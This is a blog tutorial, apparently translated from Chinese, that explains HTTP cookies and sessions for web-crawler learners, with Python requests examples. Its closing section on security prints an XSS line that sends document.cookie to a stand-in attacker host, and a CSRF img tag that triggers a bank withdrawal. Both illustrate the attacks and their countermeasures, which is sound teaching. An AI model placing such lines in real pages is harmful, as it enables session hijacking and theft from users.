Cookie origin and development

In the previous article, on crawling Youku bullet comments (danmaku), we introduced a new concept: the Cookie. Space was limited then, so we only touched briefly on its role. Today we take a comprehensive look at cookies and the related knowledge!

I believe many of you have heard of cookies and roughly understand what they do. But how they work and how they are set may not be clear to anyone who has never done web development, so today we will learn more about cookies together!

First, the background of its birth

In the first article of the crawler tutorial series, "HTTP in Detail", we described five characteristics of HTTP, one of which is that it is stateless.

Stateless HTTP: the server cannot tell whether two requests come from the same browser. In other words, the server does not know what the user did on the previous request, and every request is completely independent of the others.

The early Internet was used only for browsing simple documents, looking things up in yellow pages, visiting portals and so on; there was no notion of interaction. But as the Internet developed and broadband, servers and other hardware improved greatly, people could do more online. The interactive Web gradually rose, and HTTP's statelessness became a serious obstacle to its development!

Interactive Web: the client and the server can interact, as in user logins, online purchases, forums and so on.

If the server cannot record what the user did last time, what can be done? Clever programmers began to think about how to record the user's previous operation, and someone came up with the hidden field.

A hidden field is written as: <input type="hidden" name="field_name" value="value">

In this way the user's previous operation is recorded in the form, so the server learns about it when the form is submitted. But creating a hidden field and assigning its value on every request is cumbersome and error-prone!

P.S. Hidden fields are still powerful, and many people use them to solve problems today!

In 1994 Lou Montulli, then an employee of Netscape, applied the concept of "cookies" to network communication in order to keep a shopping cart history for online shopping. Netscape's browser was the most powerful browser at the time, and with its backing other browsers gradually began to support cookies. Today all browsers support them.

Earlier we learned that the Cookie was born because stateless HTTP could not meet the needs of the interactive Web. So what exactly is it?
[Figure: the cookies of the Baidu home page, as shown in Chrome]
The figure shows the cookies of the Baidu home page in the Chrome browser. Each row of the table represents one Cookie, so let's look at the definition of a Cookie!

A Cookie is a special piece of information that the server sends to the client. It is stored on the client as text, and the client then carries it along with every request it sends to the server, so that the server can keep track of the client's state.

Cookies are mainly used for the following three purposes:

  1. Session state management (such as user login status, shopping carts, game scores or other information that needs to be recorded)
  2. Personalized settings (such as user-defined settings, themes, etc.)
  3. Browser behavior tracking (such as tracking and analyzing user behavior)

We now know that a Cookie is special information sent by the server and stored in the browser, but what does the process look like in detail? To make it easier to understand, we take user login as an example and draw a schematic of how a Cookie works.
[Figure: schematic of the Cookie flow during user login]

After the user enters a username and password, the browser sends them to the server, which authenticates the user. Once authentication passes, the server encrypts the user information, wraps it in a Cookie, and returns it to the browser in the response headers.

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Thu, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly

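[response body]

When the browser receives the data returned by the server and finds a Set-Cookie field in the response headers, it saves the Cookie. The next time the browser sends a request to the server, it puts the Cookie in the request headers: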

GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg

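After receiving the request, the server takes the cookie from the request headers, parses it and obtains the user information, which shows that this user is logged in. A Cookie stores its data on the client.

Here we can see that the user information is stored in the Cookie, which amounts to storing it in the browser. This means users can modify that information at will, so this is an insecure strategy!

One point to emphasize: whether a Cookie travels from the server to the browser or from the browser to the server, it is always carried in the HTTP headers: in the Set-Cookie response header on the way to the browser, and in the Cookie request header on the way back!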
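The exchange above can be sketched with Python's standard http.cookies module. This is only a minimal illustration, not the code behind any particular site: the helper names build_set_cookie and parse_cookie_header are made up for this example, and the cookie value is the sample one from the headers shown earlier.

```python
from http.cookies import SimpleCookie


def build_set_cookie(name, value):
    """Server side: build the value of a Set-Cookie response header."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    cookie[name]["httponly"] = True
    # OutputString() returns only the header value, without "Set-Cookie:".
    return cookie[name].OutputString()


def parse_cookie_header(header_value):
    """Server side: turn the Cookie request header back into a dict."""
    cookie = SimpleCookie()
    cookie.load(header_value)
    return {name: morsel.value for name, morsel in cookie.items()}


# 1. The server answers the login with a Set-Cookie response header.
set_cookie = build_set_cookie("user_cookie", "Rg3vHJZnehYLjVg7qi3bZjzg")

# 2. The browser keeps the name=value pair and sends it back in the
#    Cookie request header (the attributes after ";" are not sent back).
cookie_header = set_cookie.split(";", 1)[0]

# 3. The server reads the Cookie request header on the next request.
cookies = parse_cookie_header(cookie_header)
```

Note that only the name=value pair makes the return trip; attributes such as Path and HttpOnly are instructions to the browser and stay there.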

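In the figure below we can see that a Cookie has these attributes: Name, Value, Domain, Path, Expires/Max-Age, Size, HTTP and Secure. What does each of them do? Let's take a look.
[Figure: the Cookie attribute columns shown in Chrome]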

1. Name&Value

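Name is the name of the Cookie. The server uses the name to get the value of a particular Cookie.

Value is the value of the Cookie. In most cases the server uses this value as a key to look up the saved data in its cache.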

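2. Domain&Path

Domain is the domain name that can access the cookie. We use the cookies of the Baidu Tieba page in the figure below to explain the Domain attribute.
[Figure: cookies of the Baidu Tieba page, showing the Domain column]
In the figure we can see two Domain values: the parent domain .baidu.com and its subdomain .tieba.baidu.com. The access rule is this: a page on the parent domain can only set or access cookies of the parent domain, while a subdomain (at any depth) can only set or access cookies of itself or of its parent domain. So to share a Cookie among several subdomains, the Domain attribute must be set to the parent domain!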
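The Domain rule can be expressed as a small check. The function below is a simplified sketch of the domain matching that browsers perform, written for illustration only: domain_matches is a hypothetical name, and real browsers apply further checks (IP addresses, public suffixes such as .com) that are left out here.

```python
def domain_matches(host, cookie_domain):
    """Return True if a cookie scoped to cookie_domain is sent to host.

    Simplified: the host must equal the cookie's domain or be one of
    its subdomains. A leading dot on the cookie domain is ignored.
    """
    host = host.lower()
    domain = cookie_domain.lower().lstrip(".")
    return host == domain or host.endswith("." + domain)


# A cookie set for .baidu.com is shared by every subdomain ...
shared = domain_matches("tieba.baidu.com", ".baidu.com")
# ... while a cookie set for .tieba.baidu.com is not sent to a sibling.
sibling = domain_matches("www.baidu.com", ".tieba.baidu.com")
```

The "." + domain suffix test matters: without the dot, a host such as evilbaidu.com would wrongly match baidu.com.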

Path is the page path that can access the cookie. For example, with path=/test, only pages under the /test path can read the cookie.
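A sketch of the Path rule, under the assumption that "under the /test path" means /test itself and anything below /test/. The name path_matches is hypothetical; the logic follows the usual prefix rule browsers use for cookie paths.

```python
def path_matches(request_path, cookie_path):
    """Return True if a cookie with cookie_path is sent for request_path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # The prefix must end at a path boundary, so that a cookie for
        # /test is not sent to an unrelated page such as /testing.
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


under_test = path_matches("/test/page.html", "/test")
unrelated = path_matches("/testing", "/test")
```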

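3. Expires/Max-Age

Expires/Max-Age is the cookie's expiry time. If it is set to a time, the cookie becomes invalid once that time is reached. If it is not set, the default value is Session, meaning the cookie expires together with the session: it becomes invalid when the browser is closed (the whole browser, not just a tab).

Tip: when a Cookie's expiry time is set, the date and time are relative to the client, not the server.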
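To make the difference concrete, here is a minimal sketch that builds a persistent cookie (with both Max-Age and Expires) and a session cookie (with neither) using the standard library. The function names and the theme=dark cookie are made up for this example.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime
from http.cookies import SimpleCookie


def persistent_cookie(name, value, lifetime_seconds, now=None):
    """Build a Set-Cookie value that survives a browser restart."""
    now = now or datetime.now(timezone.utc)
    cookie = SimpleCookie()
    cookie[name] = value
    # Max-Age is a lifetime in seconds, counted from when the cookie arrives.
    cookie[name]["max-age"] = lifetime_seconds
    # Expires is an absolute HTTP date in GMT.
    expires_at = now + timedelta(seconds=lifetime_seconds)
    cookie[name]["expires"] = format_datetime(expires_at, usegmt=True)
    return cookie[name].OutputString()


def session_cookie(name, value):
    """Build a Set-Cookie value with no expiry: gone when the browser closes."""
    cookie = SimpleCookie()
    cookie[name] = value
    return cookie[name].OutputString()


fixed_now = datetime(2019, 8, 15, 21, 47, 38, tzinfo=timezone.utc)
one_hour = persistent_cookie("theme", "dark", 3600, now=fixed_now)
until_close = session_cookie("theme", "dark")
```

The now parameter exists only so the example is reproducible; a server would normally let it default to the current time.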

4. Size

Size is the number of characters in the Cookie's name plus its value. For example, for the Cookie id=666, Size = 2 + 3 = 5.

In addition, browsers differ in their support for cookies.
[Figure: cookie support in different browsers]

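5. HTTP

HTTP is the cookie's HttpOnly attribute. If it is true, the cookie is only carried in HTTP request headers and cannot be accessed through document.cookie.
This feature is designed as a security measure to help prevent cookie theft through cross-site scripting (XSS) attacks launched via JavaScript.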

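6. Secure

Secure indicates whether the cookie may only be transmitted over HTTPS. Unlike the other options, it is just a flag and takes no value.

The content of such a cookie is meant to be of high value and could potentially be cracked if it were transmitted as plain text.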
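Both HttpOnly and Secure are value-less flags, which shows up clearly when a cookie is built with the standard http.cookies module. A minimal sketch follows; hardened_cookie is a hypothetical helper name and the cookie value is the sample one used earlier.

```python
from http.cookies import SimpleCookie


def hardened_cookie(name, value):
    """Build a Set-Cookie value carrying both the HttpOnly and Secure flags."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["httponly"] = True  # hidden from document.cookie
    cookie[name]["secure"] = True    # only sent over HTTPS
    return cookie[name].OutputString()


header = hardened_cookie("user_cookie", "Rg3vHJZnehYLjVg7qi3bZjzg")
# Everything after the first ";" is an attribute; the flags have no "=value".
attributes = [part.strip() for part in header.split(";")[1:]]
```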

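We said earlier that cookies are generated by the server. So how do we generate one with Python code?
[Figure: Python login code that sets a cookie]
In the login code in the figure above, after a simple check of the username and password, the server redirects to /user and sets a cookie. When the browser receives the response, it finds Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg in the response headers and saves this Cookie!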
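Since the original login code is only available as an image, here is a framework-free sketch of the same steps: check the username and password, redirect to /user, and set a cookie. It is an illustration under stated assumptions, not the author's code: the USERS and SESSIONS dictionaries, the account pig / s3cret and the login function are all invented for this example, and a real application would store password hashes rather than plain passwords.

```python
import hmac
import secrets

# Hypothetical in-memory data, for illustration only.
USERS = {"pig": "s3cret"}
SESSIONS = {}  # cookie value -> username


def login(username, password):
    """Return (status, headers) for a login attempt."""
    expected = USERS.get(username)
    # compare_digest avoids leaking information through timing differences.
    if expected is None or not hmac.compare_digest(
        expected.encode(), password.encode()
    ):
        return "401 Unauthorized", []
    # The cookie carries a random token, not the user data itself.
    token = secrets.token_urlsafe(18)
    SESSIONS[token] = username
    headers = [
        ("Location", "/user"),
        ("Set-Cookie", f"user_cookie={token}; Path=/; HttpOnly"),
    ]
    return "302 Found", headers


status, headers = login("pig", "s3cret")
```

A web framework would write these headers for you; returning them as plain tuples just keeps the Set-Cookie step visible.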

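We have been talking about the requests module recently, so here we use the requests module to get cookies.
[Figure: getting cookies with the requests module]
r.cookies returns all the cookies, and the get_dict() function returns them in dictionary format.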
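The requests call described above needs a live site, so the sketch below swaps in the standard library instead (urllib plus http.cookiejar) and talks to a throwaway local server, which lets it run offline. It is not the code from the figure: DemoHandler, fetch_cookies and demo are hypothetical names, and the dictionary it returns plays the same role as r.cookies.get_dict().

```python
import http.cookiejar
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class DemoHandler(BaseHTTPRequestHandler):
    """Hypothetical stand-in for a real site: every response sets one cookie."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Set-Cookie", "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Path=/")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def fetch_cookies(url):
    """Request url and return the cookies the server set, as a dict."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({}),  # ignore any proxy settings
        urllib.request.HTTPCookieProcessor(jar),
    )
    with opener.open(url, timeout=5):
        pass  # only the response headers matter here
    return {cookie.name: cookie.value for cookie in jar}


def demo():
    """Start the local server, fetch its cookies once, then shut it down."""
    server = HTTPServer(("127.0.0.1", 0), DemoHandler)  # port 0: pick a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return fetch_cookies(f"http://127.0.0.1:{server.server_port}/")
    finally:
        server.shutdown()
        server.server_close()
```

Calling demo() returns the cookie that the local server set. Against a real site, the requests version stays as short as the text describes.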

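In the previous article, on crawling Youku bullet comments, we used the requests module to set a Cookie.
[Figure: setting a Cookie with the requests module]
We put the Cookie copied from the browser into the code, so that the crawler can pass itself off as a browser and crawl the data normally. Copying cookies is a common technique in crawlers!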
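A Cookie copied from the browser's developer tools is one long "name=value; name=value" string. The sketch below turns such a string into a dictionary; cookie_string_to_dict is a hypothetical helper, and the theme=dark pair is invented to show more than one cookie.

```python
def cookie_string_to_dict(raw_cookie):
    """Convert 'a=1; b=2' (as copied from the browser) into {'a': '1', 'b': '2'}."""
    cookies = {}
    for pair in raw_cookie.split(";"):
        pair = pair.strip()
        if not pair or "=" not in pair:
            continue  # skip empty or malformed fragments
        # Split on the first "=" only, because values may contain "=" too.
        name, value = pair.split("=", 1)
        cookies[name.strip()] = value.strip()
    return cookies


copied = "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; theme=dark"
cookies = cookie_string_to_dict(copied)
# With requests installed, this dict can be passed as
# requests.get(url, cookies=cookies); alternatively the raw string can be
# sent unchanged as headers={"Cookie": copied}.
```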

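Six, Session

1. Background

In fact, when the Cookie was first designed it did not, as Brother Pig described above, store just a key; it stored the user information directly. At first everyone found this convenient, but a cookie lives on the client and its storage size is limited. Most importantly, its content is visible to the user, who can modify it at will, which is very insecure. So how can the information be both secure and conveniently readable everywhere? A new mechanism for storing session state was born: the Session.

2. What is a Session

A Session is a session object that the server creates for each browser. When a browser sends its first request, the server generates a Session object for it, stores the object on the server, and sends the Session's ID to the browser in the form of a cookie. The Session ends when the user explicitly ends it or when it times out.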

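Let's look at how a Session works:

  1. When a user sends the first request to the server, the server creates a session for the user and an identifier (sessionID) for that session.
  2. All subsequent requests from this user must include this identifier (sessionID). The server checks the identifier to determine which session a request belongs to.

There are two ways to carry the session identifier (sessionID): Cookie and URL rewriting. Brother Pig uses the Cookie approach to draw a schematic of how a Session works.
[Figure: schematic of how a Session works, implemented with a Cookie]
Comparing this with the Cookie schematic, we can see that a Cookie stores data directly on the client, while a Session stores data on the server. In terms of security, the Session is better!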
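The two steps of the Session mechanism can be sketched with an in-memory store. This is a minimal illustration under stated assumptions: the cookie name sessionid, the SESSIONS dictionary and the open_session function are invented for this example, and a real server would also expire old sessions.

```python
import secrets
from http.cookies import SimpleCookie

SESSIONS = {}  # sessionID -> data kept on the server


def open_session(cookie_header):
    """Return (session_id, data, set_cookie) for one incoming request.

    set_cookie is None when the browser already holds a valid sessionID.
    """
    jar = SimpleCookie()
    jar.load(cookie_header or "")
    morsel = jar.get("sessionid")
    session_id = morsel.value if morsel else None
    if session_id in SESSIONS:
        # Step 2: a known sessionID leads straight to the server-side data.
        return session_id, SESSIONS[session_id], None
    # Step 1: first request (or unknown ID), so create a fresh session.
    session_id = secrets.token_hex(16)
    SESSIONS[session_id] = {}
    set_cookie = f"sessionid={session_id}; Path=/; HttpOnly"
    return session_id, SESSIONS[session_id], set_cookie


# First request: no cookie yet, the server creates a session.
sid, data, set_cookie = open_session(None)
data["user"] = "pig"  # stored on the server, never sent to the browser

# Later request: the browser sends the sessionID back.
sid_again, data_again, set_cookie_again = open_session(f"sessionid={sid}")
```

Only the random identifier travels in the cookie. A forged identifier that the server never issued simply results in a new, empty session.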

3. Working with Session in Python

Later, Brother Pig will use a login example to explain how to work with a Session in Python code.

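Seven, interview scenarios

The relationship between Cookie and Session:

  1. Both were created to let the client and the server interact.
  2. A Cookie is stored on the client; its drawback is that it is easy to forge and insecure.
  3. A Session is stored on the server and consumes server resources.
  4. A Session can be implemented in two ways: Cookie and URL rewriting.

The security problems that cookies bring:

  1. Session hijacking and XSS: in web applications, cookies are often used to identify a user or an authorized session. So if a web application's cookies are stolen, the authorized user's session may be attacked. Common ways to steal cookies include social engineering and XSS attacks that exploit application vulnerabilities, for example: (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie; HttpOnly cookies mitigate such attacks to some extent because they block JavaScript access to the cookie.
  2. Cross-site request forgery (CSRF): Wikipedia gives a good example of CSRF. In an insecure chat room or forum, a picture can actually be a request asking your bank's server to withdraw money: <img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory"> When you open an HTML page containing this picture, if you have previously logged in to your bank account and the Cookie is still valid (and there is no other verification step), the money in your account is likely to be transferred out automatically. Countermeasures against CSRF include hidden fields, verification codes, confirmation mechanisms, and cookies with a short lifetime.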
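Of the CSRF countermeasures listed above, the hidden field is the easiest to sketch: the server stores a random token in the user's session, embeds it in its own forms, and rejects submissions that do not return it. The forged img request carries the Cookie automatically but cannot know the token. The function names and the csrf_token field name are assumptions made for this example.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Create a random token and remember it in the server-side session."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def render_hidden_field(token):
    """Embed the token in the form as a hidden field."""
    return f'<input type="hidden" name="csrf_token" value="{token}">'


def is_valid_csrf(session, submitted_token):
    """Accept the request only if the submitted token matches the session's."""
    expected = session.get("csrf_token")
    if not expected or not submitted_token:
        return False
    # Constant-time comparison, so the check does not leak partial matches.
    return hmac.compare_digest(expected.encode(), submitted_token.encode())


session = {}  # stands in for one user's server-side session data
token = issue_csrf_token(session)
form_field = render_hidden_field(token)
```

A request built by a third-party page arrives without the token, so is_valid_csrf returns False even though the browser attached a valid Cookie.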

Eight, summary

Today we explained what cookies are and how to operate on them with the requests module, and finally covered the relationship between Session and Cookie and the security problems that cookies bring. I hope you now have a comprehensive understanding of cookies, which will be very helpful in your future crawler learning!

Origin www.cnblogs.com/pig66/p/11202930.html